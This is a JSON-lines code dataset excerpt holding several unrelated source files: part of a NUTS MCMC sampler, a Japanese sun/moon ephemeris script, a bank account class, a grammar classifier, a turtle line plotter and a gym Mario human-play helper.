log_accept_thresh = energy_diff - weight_sum\n else:\n log_slice_sample = current_step_meta_info.log_slice_sample\n not_divergent = log_slice_sample - energy_diff < self.max_energy_diff\n # Uniform sampling on the trajectory within the subtree across valid\n # samples.\n is_valid = log_slice_sample <= energy_diff\n weight_sum = tf.where(is_valid,\n candidate_tree_state.weight + 1,\n candidate_tree_state.weight)\n log_accept_thresh = tf.where(\n is_valid,\n -tf.math.log(tf.cast(weight_sum, dtype=tf.float32)),\n tf.constant(-np.inf, dtype=tf.float32))\n u = tf.math.log1p(-samplers.uniform(\n shape=batch_shape,\n dtype=log_accept_thresh.dtype,\n seed=acceptance_seed))\n is_sample_accepted = u <= log_accept_thresh\n\n next_candidate_tree_state = TreeDoublingStateCandidate(\n state=[\n bu.where_left_justified_mask(is_sample_accepted, s0, s1)\n for s0, s1 in zip(next_state_parts, candidate_tree_state.state)\n ],\n target=bu.where_left_justified_mask(\n is_sample_accepted, next_target, candidate_tree_state.target),\n target_grad_parts=[\n bu.where_left_justified_mask(is_sample_accepted, grad0, grad1)\n for grad0, grad1 in zip(next_target_grad_parts,\n candidate_tree_state.target_grad_parts)\n ],\n energy=bu.where_left_justified_mask(\n is_sample_accepted,\n current_energy,\n candidate_tree_state.energy),\n weight=weight_sum)\n\n continue_tree = not_divergent & continue_tree_previous\n continue_tree_next = no_u_turns_within_tree & continue_tree\n\n not_divergent_tokeep = tf.where(\n continue_tree_previous,\n not_divergent,\n ps.ones(batch_shape, dtype=tf.bool))\n\n # min(1., exp(energy_diff)).\n exp_energy_diff = tf.math.exp(tf.minimum(energy_diff, 0.))\n energy_diff_sum = tf.where(continue_tree,\n energy_diff_sum_previous + exp_energy_diff,\n energy_diff_sum_previous)\n\n return (\n iter_ + 1,\n next_seed,\n energy_diff_sum,\n momentum_cumsum,\n leapfrogs_taken,\n next_tree_state,\n next_candidate_tree_state,\n continue_tree_next,\n not_divergent_previous & not_divergent_tokeep,\n momentum_state_memory,\n )\n\n\ndef has_not_u_turn_at_all_index(read_indexes, direction, momentum_state_memory,\n momentum_right, state_right,\n no_u_turns_within_tree, log_prob_rank,\n shard_axis_names=None):\n \"\"\"Check u turn for early stopping.\"\"\"\n\n def _get_left_state_and_check_u_turn(left_current_index, no_u_turns_last):\n \"\"\"Check U turn on a single index.\"\"\"\n momentum_left = [\n tf.gather(x, left_current_index, axis=0)\n for x in momentum_state_memory.momentum_swap\n ]\n state_left = [\n tf.gather(x, left_current_index, axis=0)\n for x in momentum_state_memory.state_swap\n ]\n # Note that in generalized u turn, state_diff is actually the cumulated sum\n # of the momentum.\n state_diff = [s1 - s2 for s1, s2 in zip(state_right, state_left)]\n if not GENERALIZED_UTURN:\n state_diff = [tf.where(d, m, -m) for d, m in zip(direction, state_diff)]\n\n no_u_turns_current = has_not_u_turn(\n state_diff,\n momentum_left,\n momentum_right,\n log_prob_rank,\n shard_axis_names=shard_axis_names)\n return left_current_index + 1, no_u_turns_current & no_u_turns_last\n\n _, no_u_turns_within_tree = tf.while_loop(\n cond=lambda i, no_u_turn: ((i < read_indexes[1]) & # pylint: disable=g-long-lambda\n tf.reduce_any(no_u_turn)),\n body=_get_left_state_and_check_u_turn,\n loop_vars=(read_indexes[0], no_u_turns_within_tree))\n return no_u_turns_within_tree\n\n\ndef has_not_u_turn(state_diff,\n momentum_left,\n momentum_right,\n log_prob_rank,\n shard_axis_names=None):\n \"\"\"If the trajectory does not exhibit a U-turn pattern.\"\"\"\n shard_axis_names = (shard_axis_names or ([None] * len(state_diff)))\n def reduce_sum(x, m, shard_axes):\n out = tf.reduce_sum(x, axis=ps.range(log_prob_rank, ps.rank(m)))\n if shard_axes is not None:\n out = distribute_lib.psum(out, shard_axes)\n return out\n with tf.name_scope('has_not_u_turn'):\n batch_dot_product_left = sum(\n reduce_sum(s_diff * m, m, axes)\n for s_diff, m, axes in zip(state_diff, momentum_left,\n shard_axis_names)\n )\n batch_dot_product_right = sum(\n reduce_sum(s_diff * m, m, axes)\n for s_diff, m, axes in zip(state_diff, momentum_right,\n shard_axis_names)\n )\n return (batch_dot_product_left >= 0) & (batch_dot_product_right >= 0)\n\n\ndef build_tree_uturn_instruction(max_depth, init_memory=0):\n \"\"\"Run build tree and output the u turn checking input instruction.\"\"\"\n\n def _buildtree(address, depth):\n if depth == 0:\n address += 1\n return address, address\n else:\n address_left, address_right = _buildtree(address, depth - 1)\n _, address_right = _buildtree(address_right, depth - 1)\n instruction.append((address_left, address_right))\n return address_left, address_right\n\n instruction = []\n _, _ = _buildtree(init_memory, max_depth)\n return np.unique(np.array(instruction, dtype=np.int32), axis=0)\n\n\ndef generate_efficient_write_read_instruction(instruction_array):\n \"\"\"Statically generate a memory efficient write/read instruction.\"\"\"\n nsteps_within_tree = np.max(instruction_array) + 1\n instruction_mat = np.zeros((nsteps_within_tree, nsteps_within_tree))\n for previous_step, current_step in instruction_array:\n instruction_mat[previous_step, current_step] = 1\n\n # Generate a sparse matrix that represents the memory footprint:\n # -1 : no need to save to memory (these are odd steps)\n # 1 : needed for check u turn (either already in memory or will be saved)\n # 0 : still in memory but not needed for check u turn\n for i in range(nsteps_within_tree):\n temp = instruction_mat[i]\n endpoint = np.where(temp == 1)[0]\n if endpoint.size > 0:\n temp[:i] = -1\n temp[endpoint[-1]+1:] = -1\n instruction_mat[i] = temp\n else:\n instruction_mat[i] = -1\n\n # In the classical U-turn check, the writing is only at odd step and the\n # instruction follows squence A000120 (https://oeis.org/A000120)\n to_write_temp = np.sum(instruction_mat > -1, axis=0)\n write_instruction = to_write_temp - 1\n write_instruction[np.diag(instruction_mat) == -1] = max(to_write_temp)\n\n read_instruction = []\n for i in range(nsteps_within_tree):\n temp_instruction = instruction_mat[:, i]\n if np.sum(temp_instruction == 1) > 0:\n r = np.where(temp_instruction[temp_instruction >= 0] == 1)[0][0]\n read_instruction.append([r, r + np.sum(temp_instruction == 1)])\n else:\n # If there is no instruction to do U turn check (e.g., odd step in the\n # original U turn check scheme), we append a pair of 0s as instruction.\n # In the inner most while loop of build tree, we loop through the read\n # instruction to check U turn - looping from 0 to 0 works with the\n # existing code while no computation happens.\n read_instruction.append([0, 0])\n return write_instruction, np.asarray(read_instruction)\n\n\ndef _prepare_step_size(step_size, dtype, n_state_parts):\n step_sizes, _ = mcmc_util.prepare_state_parts(\n step_size, dtype=dtype, name='step_size')\n if len(step_sizes) == 1:\n step_sizes *= n_state_parts\n if n_state_parts != len(step_sizes):\n raise ValueError('There should be exactly one `step_size` or it should '\n 'have same length as `current_state`.')\n return step_sizes\n\n\ndef compute_hamiltonian(target_log_prob, momentum_parts,\n shard_axis_names=None):\n \"\"\"Compute the Hamiltonian of the current system.\"\"\"\n shard_axis_names = (shard_axis_names or ([None] * len(momentum_parts)))\n independent_chain_ndims = ps.rank(target_log_prob)\n def compute_sum_sq(v, shard_axes):\n sum_sq = tf.reduce_sum(v ** 2., axis=ps.range(\n independent_chain_ndims, ps.rank(v)))\n if shard_axes is not None:\n sum_sq = distribute_lib.psum(sum_sq, shard_axes)\n return sum_sq\n momentum_sq_parts = (\n tf.cast( # pylint: disable=g-complex-comprehension\n compute_sum_sq(m, axes),\n dtype=target_log_prob.dtype)\n for m, axes in zip(momentum_parts, shard_axis_names))\n # TODO(jvdillon): Verify no broadcasting happening.\n return target_log_prob - 0.5 * sum(momentum_sq_parts)\n\n\ndef _safe_tensor_scatter_nd_update(tensor, indices, updates):\n if tensorshape_util.num_elements(tensor.shape) == 0:\n return tensor\n return tf.tensor_scatter_nd_update(tensor, indices, updates)\n","sub_path":"tensorflow_probability/python/mcmc/nuts.py","file_name":"nuts.py","file_ext":"py","file_size_in_byte":45152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"565084193","text":"#! /usr/local/bin/python3.6\n\"\"\"\n----------------------------------------------------\n海上保安庁の天測暦より太陽・月の視位置を計算\n(視黄経・視黄緯の計算を追加したもの)\n\n date name version\n 2018.03.30 mk-mode.com 1.00 新規作成\n\n Copyright(C) 2018 mk-mode.com All Rights Reserved.\n----------------------------------------------------\n 引数 : JST(日本標準時)\n 書式:YYYYMMDD or YYYYMMDDHHMMSS\n 無指定なら現在(システム日時)と判断。\n----------------------------------------------------\n\"\"\"\nimport datetime\nimport math\nimport re\nimport sys\nimport traceback\nimport consts as cst\n\n\nclass EphSunMoon:\n JST_UTC = 9 # JST - UTC\n MSG_ERR_1 = \"[ERROR] Format: YYYYMMDD or YYYYMMDDHHMMSS\"\n MSG_ERR_2 = \"[ERROR] It should be between 20080101090000 and 20200101085959.\"\n MSG_ERR_3 = \"[ERROR] Invalid date!\"\n DIVS = {\n \"SUN_RA\": cst.SUN_RA,\n \"SUN_DEC\": cst.SUN_DEC,\n \"SUN_DIST\": cst.SUN_DIST,\n \"MOON_RA\": cst.MOON_RA,\n \"MOON_DEC\": cst.MOON_DEC,\n \"MOON_HP\": cst.MOON_HP,\n \"R\": cst.R,\n \"EPS\": cst.EPS\n }\n DELTA_T = {\n 2008: 65, 2009: 66, 2010: 66, 2011: 67, 2012: 67, 2013: 67,\n 2014: 67, 2015: 68, 2016: 68, 2017: 68, 2018: 69, 2019:70\n }\n\n def __init__(self):\n self.vals = {} # 所要値格納用dict\n self.__get_arg() # 引数取得\n\n def exec(self):\n \"\"\" 実行 \"\"\"\n try:\n self.__calc_t() # 通日 T の計算\n self.__calc_f() # 世界時 UT(時・分・秒) の端数計算\n self.__get_delta_t() # ΔT(世界時 - 地球時)の取得\n self.__calc_tm() # 計算用時刻引数 tm の計算\n self.__calc() # 各種計算\n self.__display() # 結果出力\n except Exception as e:\n raise\n\n def __get_arg(self):\n \"\"\" 引数取得\n * コマンドライン引数を取得して日時の妥当性チェックを行う。\n * コマンドライン引数無指定なら、現在日時とする。\n * JST, UTC をインスタンス変数 jst, utc に格納する。\n \"\"\"\n try:\n if len(sys.argv) < 2:\n self.jst = datetime.datetime.now()\n else:\n arg = sys.argv[1]\n if re.search(r\"^([0-9]{8}|[0-9]{14})$\", arg) is None:\n print(self.MSG_ERR_1)\n sys.exit()\n arg = arg.ljust(14, \"0\")\n try:\n self.jst = datetime.datetime.strptime(arg, \"%Y%m%d%H%M%S\")\n except ValueError:\n print(self.MSG_ERR_3)\n sys.exit(1)\n self.utc = self.jst - datetime.timedelta(hours=self.JST_UTC)\n except Exception as e:\n raise\n\n def __calc_t(self):\n \"\"\" 通日 T の計算\n * 通日 T は1月0日を第0日とした通算日数で、次式により求める。\n T = 30 * P + Q * (S - Y) + P * (1 - Q) + 日\n 但し、\n P = 月 - 1, Q = [(月 + 7) / 10]\n Y = [(年 / 4) - [(年 / 4)] + 0.77]\n S = [P * 0.55 - 0.33]\n で、[] は整数部のみを抜き出すことを意味する。\n * 求めた通日 T はインスタンス変数 t に格納する。\n \"\"\"\n try:\n p = self.utc.month - 1\n q = (self.utc.month + 7) // 10\n y = int(self.utc.year / 4 - self.utc.year // 4 + 0.77)\n s = int(p * 0.55 - 0.33)\n self.t = 30 * p + q * (s - y) + p * (1 - q) + self.utc.day\n except Exception as e:\n raise\n\n def __calc_f(self):\n \"\"\" 世界時 UT(時・分・秒) の端数計算\n * 次式により求め、インスタンス変数 f に格納する。\n F = 時 / 24 + 分 / 1440 + 秒 / 86400\n \"\"\"\n try:\n self.f = self.utc.hour / 24 \\\n + self.utc.minute / 1440 \\\n + self.utc.second / 86400\n except Exception as e:\n raise\n\n def __get_delta_t(self):\n \"\"\" ΔT(世界時 - 地球時)の取得\n * あらかじめ予測されている ΔT の値を取得し、インスタンス変数 delta_t\n に格納する。\n \"\"\"\n try:\n self.delta_t = self.DELTA_T[self.utc.year]\n except Exception as e:\n raise\n\n def __calc_tm(self):\n \"\"\" 計算用時刻引数 tm の計算\n * 次式により求め、インスタンス変数 tm, tm_r に格納する。\n (R 計算用は tm_r, その他は tm)\n tm = T + F + ΔT / 86400\n tm_r = T + F\n \"\"\"\n try:\n self.tm_r = self.t + self.f\n self.tm = self.tm_r + self.delta_t / 86400\n except Exception as e:\n raise\n\n def __calc(self):\n \"\"\" 各種計算\n * 各種値を計算し、インスタンス変数 vals に格納する。\n \"\"\"\n try:\n # 各種係数からの計算\n for div, vals in self.DIVS.items():\n a, b, coeffs = self.__get_coeffs(vals) # 係数値等の取得\n t = self.tm_r if div == \"R\" else self.tm # 計算用時刻引数\n theta = self.__calc_theta(a, b, t) # θ の計算\n val = self.__calc_ft(theta, coeffs) # 所要値の計算\n if re.search(r\"(_RA|^R)$\", div) is not(None):\n while val >= 24.0:\n val -= 24.0\n while val <= 0.0:\n val += 24.0\n self.vals[div] = val\n # グリニジ時角の計算\n self.vals[\"SUN_H\" ] = self.__calc_h(self.vals[\"SUN_RA\" ])\n self.vals[\"MOON_H\"] = self.__calc_h(self.vals[\"MOON_RA\"])\n # 視半径の計算\n self.vals[\"SUN_SD\" ] = self.__calc_sd_sun()\n self.vals[\"MOON_SD\"] = self.__calc_sd_moon()\n # 視黄経・視黄緯の計算\n self.vals[\"SUN_LAMBDA\"] = self.__calc_lambda(\n self.vals[\"SUN_RA\"], self.vals[\"SUN_DEC\"]\n )\n self.vals[\"SUN_BETA\"] = self.__calc_beta(\n self.vals[\"SUN_RA\"], self.vals[\"SUN_DEC\"]\n )\n self.vals[\"MOON_LAMBDA\"] = self.__calc_lambda(\n self.vals[\"MOON_RA\"], self.vals[\"MOON_DEC\"]\n )\n self.vals[\"MOON_BETA\"] = self.__calc_beta(\n self.vals[\"MOON_RA\"], self.vals[\"MOON_DEC\"]\n )\n # 視黄経差(太陽 - 月)\n self.vals[\"LAMBDA_S_M\"] = self.__calc_lambda_sun_moon()\n except Exception as e:\n raise\n\n def __get_coeffs(self, vals):\n \"\"\" 係数等の取得\n * 引数の文字列の定数配列から a, b, 係数配列を取得する。\n\n :param list vals: 定数名\n :return list: [a, b, 係数配列]\n \"\"\"\n a, b = 0, 0\n coeffs = []\n try:\n for row in vals:\n if row[0] != self.utc.year:\n continue\n if row[1][0] <= int(self.tm) and int(self.tm) <= row[1][1]:\n a, b = row[1]\n coeffs = row[2]\n break\n return [a, b, coeffs]\n except Exception as e:\n raise\n\n def __calc_theta(self, a, b, t):\n \"\"\" θ の計算\n * θ を次式により計算する。\n θ = cos^(-1)((2 * t - (a + b)) / (b - a))\n 但し、0°<= θ <= 180°\n\n :param int a\n :param int b\n :param float t\n :return float theta: 単位: °\n \"\"\"\n try:\n if b < t: # 年末のΔT秒分も計算可能とするための応急処置\n b = t\n theta = (2 * t - (a + b)) / (b - a)\n theta = math.acos(theta) * 180 / math.pi\n return theta\n except Exception as e:\n raise\n\n def __calc_ft(self, theta, coeffs):\n \"\"\" 所要値の計算\n * θ, 係数配列から次式により所要値を計算する。\n f(t) = C_0 + C_1 * cos(θ) + C_2 * cos(2θ) + ... + C_N * cos(Nθ)\n\n :param float theta: θ\n :param list coeffs: 係数配列\n :return float ft: 所要値\n \"\"\"\n ft = 0.0\n try:\n for i, c in enumerate(coeffs):\n ft += c * math.cos(theta * i * math.pi / 180)\n return ft\n except Exception as e:\n raise\n\n def __calc_h(self, ra):\n \"\"\" グリニジ時角の計算\n * 次式によりグリニジ時角を計算する。\n h = E + UT\n (但し、E = R - R.A.)\n\n :param float ra: R.A.\n :return float h: 単位 h\n \"\"\"\n try:\n e = self.vals[\"R\"] - ra\n h = e + self.f * 24\n return h\n except Exception as e:\n raise\n\n def __calc_sd_sun(self):\n \"\"\" 視半径(太陽)の計算\n * 次式により視半径を計算する。\n S.D.= 16.02 ′/ Dist.\n\n :return float sd: 単位 ′\n \"\"\"\n try:\n sd = 16.02 / self.vals[\"SUN_DIST\"]\n return sd\n except Exception as e:\n raise\n\n def __calc_sd_moon(self):\n \"\"\" 視半径(月)の計算\n * 次式により視半径を計算する。\n S.D.= sin^(-1) (0.2725 * sin(H.P.))\n\n :return float sd: 単位 ′\n \"\"\"\n try:\n sd = 0.2725 * math.sin(self.vals[\"MOON_HP\"] * math.pi / 180.0)\n sd = math.asin(sd) * 60.0 * 180.0 / math.pi\n return sd\n except Exception as e:\n raise\n\n def __calc_lambda(self, alpha, delta):\n \"\"\" 視黄経の計算\n * 次式により視黄経を計算する\n λ = arctan(sinδ sinε + cosδ sinα cosε / cosδ cosα)\n (α: 視赤経、δ: 視赤緯、 ε: 黄道傾斜角)\n\n :param float alpha: 視赤経, RA\n :param float delta: 視赤緯, DEC\n :return float lm: 視黄経\n \"\"\"\n try:\n alpha = alpha * 15 * math.pi / 180\n delta = delta * math.pi / 180\n eps = self.vals[\"EPS\"] * math.pi / 180\n lm_a = math.sin(delta) * math.sin(eps)\n lm_a += math.cos(delta) * math.sin(alpha) * math.cos(eps)\n lm_b = math.cos(delta) * math.cos(alpha)\n lm = math.atan2(lm_a, lm_b) * 180 / math.pi\n if lm < 0:\n lm += 360\n return lm\n except Exception as e:\n raise\n\n def __calc_beta(self, alpha, delta):\n \"\"\" 視黄緯の計算\n * 次式により視黄経を計算する\n β = arcsin(sinδ cosε − cosδ sinα sinε)\n (α: 視赤経、δ: 視赤緯、 ε: 黄道傾斜角)\n\n :param float alpha: 視赤経, RA\n :param float delta: 視赤緯, DEC\n :return float bt: 視黄緯\n \"\"\"\n try:\n alpha = alpha * 15 * math.pi / 180\n delta = delta * math.pi / 180\n eps = self.vals[\"EPS\"] * math.pi / 180\n bt = math.sin(delta) * math.cos(eps)\n bt -= math.cos(delta) * math.sin(alpha) * math.sin(eps)\n bt = math.asin(bt) * 180 / math.pi\n return bt\n except Exception as e:\n raise\n\n def __calc_lambda_sun_moon(self):\n \"\"\" 視黄経差(太陽 - 月)の計算\n * SUN_LAMBDA - MOON_LAMBDA\n\n :return float: 視黄経差(太陽 - 月)\n \"\"\"\n try:\n return self.vals[\"SUN_LAMBDA\"] - self.vals[\"MOON_LAMBDA\"]\n except Exception as e:\n raise\n\n def __display(self):\n \"\"\" 結果出力 \"\"\"\n try:\n s = (\n \"[ JST: {}, UTC: {} ]\\n\"\n \" SUN R.A. = {:12.8f} h (={:s})\\n\"\n \" SUN DEC. = {:12.8f} ° (={:s})\\n\"\n \" SUN DIST. = {:12.8f} AU\\n\"\n \" SUN hG. = {:12.8f} h (={:s})\\n\"\n \" SUN S.D. = {:12.8f} ′ (={:s})\\n\"\n \" MOON R.A. = {:12.8f} h (={:s})\\n\"\n \" MOON DEC. = {:12.8f} ° (={:s})\\n\"\n \" MOON H.P. = {:12.8f} ° (={:s})\\n\"\n \" MOON hG. = {:12.8f} h (={:s})\\n\"\n \" MOON S.D. = {:12.8f} ′ (={:s})\\n\"\n \" R = {:12.8f} h (={:s})\\n\"\n \" EPS. = {:12.8f} ° (={:s})\\n\"\n \" ---\\n\"\n \" SUN LAMBDA ={:13.8f} ° (={:s})\\n\"\n \" SUN BETA ={:13.8f} ° (={:s})\\n\"\n \" MOON LAMBDA ={:13.8f} ° (={:s})\\n\"\n \" MOON BETA ={:13.8f} ° (={:s})\\n\"\n \" DIFF LAMBDA ={:13.8f} °\"\n ).format(\n self.jst.strftime(\"%Y-%m-%d %H:%M:%S\"),\n self.utc.strftime(\"%Y-%m-%d %H:%M:%S\"),\n self.vals[\"SUN_RA\"],\n self.__hour2hms(self.vals[\"SUN_RA\"]),\n self.vals[\"SUN_DEC\"],\n self.__deg2dms(self.vals[\"SUN_DEC\"]),\n self.vals[\"SUN_DIST\"],\n self.vals[\"SUN_H\"],\n self.__hour2hms(self.vals[\"SUN_H\"]),\n self.vals[\"SUN_SD\"],\n self.__deg2dms(self.vals[\"SUN_SD\"] / 60),\n self.vals[\"MOON_RA\"],\n self.__hour2hms(self.vals[\"MOON_RA\"]),\n self.vals[\"MOON_DEC\"],\n self.__deg2dms(self.vals[\"MOON_DEC\"]),\n self.vals[\"MOON_HP\"],\n self.__deg2dms(self.vals[\"MOON_HP\"]),\n self.vals[\"MOON_H\"],\n self.__hour2hms(self.vals[\"MOON_H\"]),\n self.vals[\"MOON_SD\"],\n self.__deg2dms(self.vals[\"MOON_SD\"] / 60),\n self.vals[\"R\"],\n self.__hour2hms(self.vals[\"R\"]),\n self.vals[\"EPS\"],\n self.__deg2dms(self.vals[\"EPS\"]),\n self.vals[\"SUN_LAMBDA\"],\n self.__deg2dms(self.vals[\"SUN_LAMBDA\"]),\n self.vals[\"SUN_BETA\"],\n self.__deg2dms(self.vals[\"SUN_BETA\"]),\n self.vals[\"MOON_LAMBDA\"],\n self.__deg2dms(self.vals[\"MOON_LAMBDA\"]),\n self.vals[\"MOON_BETA\"],\n self.__deg2dms(self.vals[\"MOON_BETA\"]),\n self.vals[\"LAMBDA_S_M\"]\n )\n print(s)\n except Exception as e:\n raise\n\n def __hour2hms(self, hour):\n \"\"\" 99.999h -> 99h99m99s 変換\n\n :param float hour\n :return string: 99 h 99 m 99.999 s\n \"\"\"\n try:\n pm = \"-\" if hour < 0 else \" \"\n if hour < 0:\n hour *= -1\n h = int(hour)\n h_r = hour - h\n m = int(h_r * 60)\n m_r = h_r * 60 - m\n s = m_r * 60\n return \" {:>3s} h {:02d} m {:06.3f} s\".format(pm + str(h), m, s)\n except Exception as e:\n raise\n\n def __deg2dms(self, deg):\n \"\"\" 99.999° -> 99°99′99″ 変換\n\n :param float deg\n :return string: 99 ° 99 ′ 99.999 ″\n \"\"\"\n try:\n pm = \"-\" if deg < 0 else \" \"\n if deg < 0:\n deg *= -1\n d = int(deg)\n d_r = deg - d\n m = int(d_r * 60)\n m_r = d_r * 60 - m\n s = m_r * 60\n return \"{:>4s} ° {:02d} ′ {:06.3f} ″\".format(pm + str(d), m, s)\n except Exception as e:\n raise\n\n\nif __name__ == '__main__':\n try:\n obj = EphSunMoon()\n obj.exec()\n except Exception as e:\n traceback.print_exc()\n sys.exit(1)\n\n","sub_path":"ephemeris_jcg_i/eph_sun_moon_ecliptic.py","file_name":"eph_sun_moon_ecliptic.py","file_ext":"py","file_size_in_byte":16079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"8357782","text":"class BankAccount:\n def __init__(self,number, aadhar, name, balance):\n self.__account_number=number\n self.__masked_aadhar=aadhar*4\n self.__name=name\n self.__balance=balance\n \n def deposite(self, money):\n if money<=0:\n print(\"Minimum of 1 rupees should be deposited\")\n return False\n else:\n self.__balance+=money\n return True\n\n def withdraw(self,money):\n if self.__balance')\n b[0] = b[0].strip(' ')\n b[1]=b[1].strip(' ')\n c=[]\n c=b[1].split('|')\n e=[]\n e.append(b[0])\n e.append(c)\n a.append(e)\nprint(a)\n\nf1=True# ГРЕЙБАХ\nf2=True# ХОМСКИЙ\nf3=True# ЛЕВО\nf4=True# ПРАВО\nf=True\n\nfor b in a:\n if (b[0].upper()==b[0]) & (len(b[0])==1):\n for c in b[1]:\n if (c.upper()==c) & (c!='E') & (f1|f3|f4) & f:# если только нетерминалы\n f1=f3=f4=False\n elif (c.lower()!=c) & (c!='E') & f:\n f2=False\n if (c[0]!=c[0].lower()):\n f1=False\n if len(c[1:])>0:\n if (c[1:]!=c[1:].upper()):\n f1=False\n\n k = 0\n for w in c:\n w1 = w.lower()\n if w != w1:\n k += 1\n if k > 1:\n f3 = f4 = False\n\n if f4 & (c[0]==c[0].upper()):\n f3=False\n if f3 & (c[len(c)-1]==c[len(c)-1].upper()):\n f4=False\n\n elif f & (c.lower()==c):\n if len(c)>1:\n f=False\n\n\n else:\n f=False\n\nif f:\n if f2:\n print(\"это нормальная форма Хомского\")\n elif f1:\n print(\"это нормальная форма Грейбах\")\n elif f3:\n print(\"это левая грамматика\")\n elif f4:\n print(\"это правая грамматика\")\n else:\n print(\"это просто кс грамматика\")\nelse:\n print(\"это не кс грамматика\")","sub_path":"3 задача.py","file_name":"3 задача.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"72807927","text":"# Allen, Sungmin, Yejun, Taiga\r\nimport turtle as trtl\r\n\r\nt = trtl.Turtle()\r\n\r\nt.speed(0)\r\n\r\n\r\n# The Slope and Y-intecept\r\nprint(\"This program Creates a linear line (only positive) Y = mx + b\")\r\nm = int(input(\"Enter a number for m : \"))\r\nb = int(input(\"Enter a number for b: \"))\r\n\r\n\r\n# coordanite plane\r\n\r\n\r\n # y hashmark\r\nt.pencolor(\"grey\")\r\nx = 0\r\ny_pos = -400\r\nwhile x < 85:\r\n t.penup()\r\n t.goto(-400,y_pos)\r\n t.pendown()\r\n t.forward(800)\r\n t.backward(800)\r\n y_pos += 10\r\n x += 1\r\n\r\n # y hashmark\r\nt.setheading(0)\r\nt.left(90)\r\ny = 0\r\nx_pos = -400\r\nwhile y < 81:\r\n t.penup()\r\n t.goto(x_pos,-400 )\r\n t.pendown()\r\n t.forward(800)\r\n t.backward(800)\r\n x_pos += 10\r\n y += 1\r\n \r\n # Y & X axis\r\nt.color(\"black\")\r\nt.pensize(3)\r\nt.penup()\r\nt.goto(0,0)\r\nt.setheading(0)\r\nt.pendown()\r\nt.forward(400)\r\nt.backward(800)\r\nt.goto(0,0)\r\nt.setheading(90)\r\nt.pendown\r\nt.forward(400)\r\nt.backward(800)\r\n\r\n# The line\r\n\r\nt.penup()\r\nt.goto(0,0)\r\n\r\nx_cor = 0\r\ny_cor = 0\r\n\r\n# b\r\nt.color(\"red\")\r\nt.setheading(0)\r\nt.penup()\r\nt.forward(b)\r\n\r\n# m\r\n\r\n #Line going up\r\nfor i in range(40):\r\n t.pendown()\r\n x_cor = m*i\r\n y_cor = x_cor + b\r\n t.goto(x_cor, y_cor)\r\n t.penup()\r\nt.pendown()\r\nt.left(45)\r\nt.shape(\"arrow\")\r\nt.stamp()\r\nt.penup()\r\nt.goto(0,b)\r\n\r\n\r\n #Line going down\r\nfor i in range(40):\r\n t.pendown()\r\n x_cor = m*i\r\n y_cor = x_cor + b\r\n t.goto(-(x_cor), -(y_cor))\r\n t.penup()\r\n\r\nt.pendown()\r\nt.setheading(270)\r\nt.right(45)\r\nt.stamp()\r\n\r\n\r\n\r\nwn = trtl.Screen()\r\nwn.mainloop()","sub_path":"linergraph.py","file_name":"linergraph.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"378336628","text":"\"\"\"A method to play gym environments using human IO inputs.\"\"\"\nimport os\nimport gym\nimport pygame\nfrom typing import Callable\n\n\ndef display_arr(screen, arr, video_size, transpose):\n arr_min, arr_max = arr.min(), arr.max()\n arr = 255.0 * (arr - arr_min) / (arr_max - arr_min)\n pyg_img = pygame.surfarray.make_surface(arr.swapaxes(0, 1) if transpose else arr)\n pyg_img = pygame.transform.scale(pyg_img, video_size)\n screen.blit(pyg_img, (0,0))\n\n\ndef play(env: gym.Env,\n transpose: bool=True,\n fps: int=30,\n callback: Callable=None,\n nop_: any=0,\n) -> None:\n \"\"\"Play the game using the keyboard as a human.\n\n Args:\n env: gym.Env\n Environment to use for playing.\n transpose: bool\n If True the output of observation is transposed.\n Defaults to true.\n fps: int\n Maximum number of steps of the environment to execute every second.\n Defaults to 30.\n callback: lambda or None\n Callback if a callback is provided it will be executed after\n every step. It takes the following input:\n obs_t: observation before performing action\n obs_tp1: observation after performing action\n action: action that was executed\n rew: reward that was received\n done: whether the environemnt is done or not\n info: debug info\n nop_: the object to use as a null op action for the environment\n\n Returns:\n None\n\n \"\"\"\n # type check the observation space\n obs_s = env.observation_space\n assert type(obs_s) == gym.spaces.box.Box\n assert len(obs_s.shape) == 2 or (len(obs_s.shape) == 3 and obs_s.shape[2] in [1,3])\n # get the mapping of keyboard keys to actions in the environment\n if hasattr(env, 'get_keys_to_action'):\n keys_to_action = env.get_keys_to_action()\n elif hasattr(env.unwrapped, 'get_keys_to_action'):\n keys_to_action = env.unwrapped.get_keys_to_action()\n else:\n raise ValueError('env has no get_keys_to_action method')\n relevant_keys = set(sum(map(list, keys_to_action.keys()),[]))\n # transpose the video is specified\n if transpose:\n video_size = env.observation_space.shape[1], env.observation_space.shape[0]\n else:\n video_size = env.observation_space.shape[0], env.observation_space.shape[1]\n\n pressed_keys = []\n running = True\n env_done = True\n # setup the screen using pygame\n screen = pygame.display.set_mode(video_size)\n pygame.display.set_caption(env.spec.id)\n # disable the SDL video driver so FCEUX wont open a window\n os.environ['SDL_VIDEODRIVER'] = 'dummy'\n clock = pygame.time.Clock()\n # start the main game loop\n while running:\n if env_done:\n env_done = False\n obs = env.reset()\n else:\n action = keys_to_action.get(tuple(sorted(pressed_keys)), nop_)\n prev_obs = obs\n obs, rew, env_done, info = env.step(action)\n if callback is not None:\n callback(prev_obs, obs, action, rew, env_done, info)\n if obs is not None:\n if len(obs.shape) == 2:\n obs = obs[:, :, None]\n if obs.shape[2] == 1:\n obs = obs.repeat(3, axis=2)\n display_arr(screen, obs, transpose=transpose, video_size=video_size)\n\n # process pygame events\n for event in pygame.event.get():\n # test events, set key states\n if event.type == pygame.KEYDOWN:\n if event.key in relevant_keys:\n pressed_keys.append(event.key)\n elif event.key == 27:\n running = False\n elif event.type == pygame.KEYUP:\n if event.key in relevant_keys:\n pressed_keys.remove(event.key)\n elif event.type == pygame.QUIT:\n running = False\n\n pygame.display.flip()\n clock.tick(fps)\n pygame.quit()\n\n\n# explicitly define the outward facing API of the module\n__all__ = [play.__name__]\n","sub_path":"gym_super_mario_bros/_human_play.py","file_name":"_human_play.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
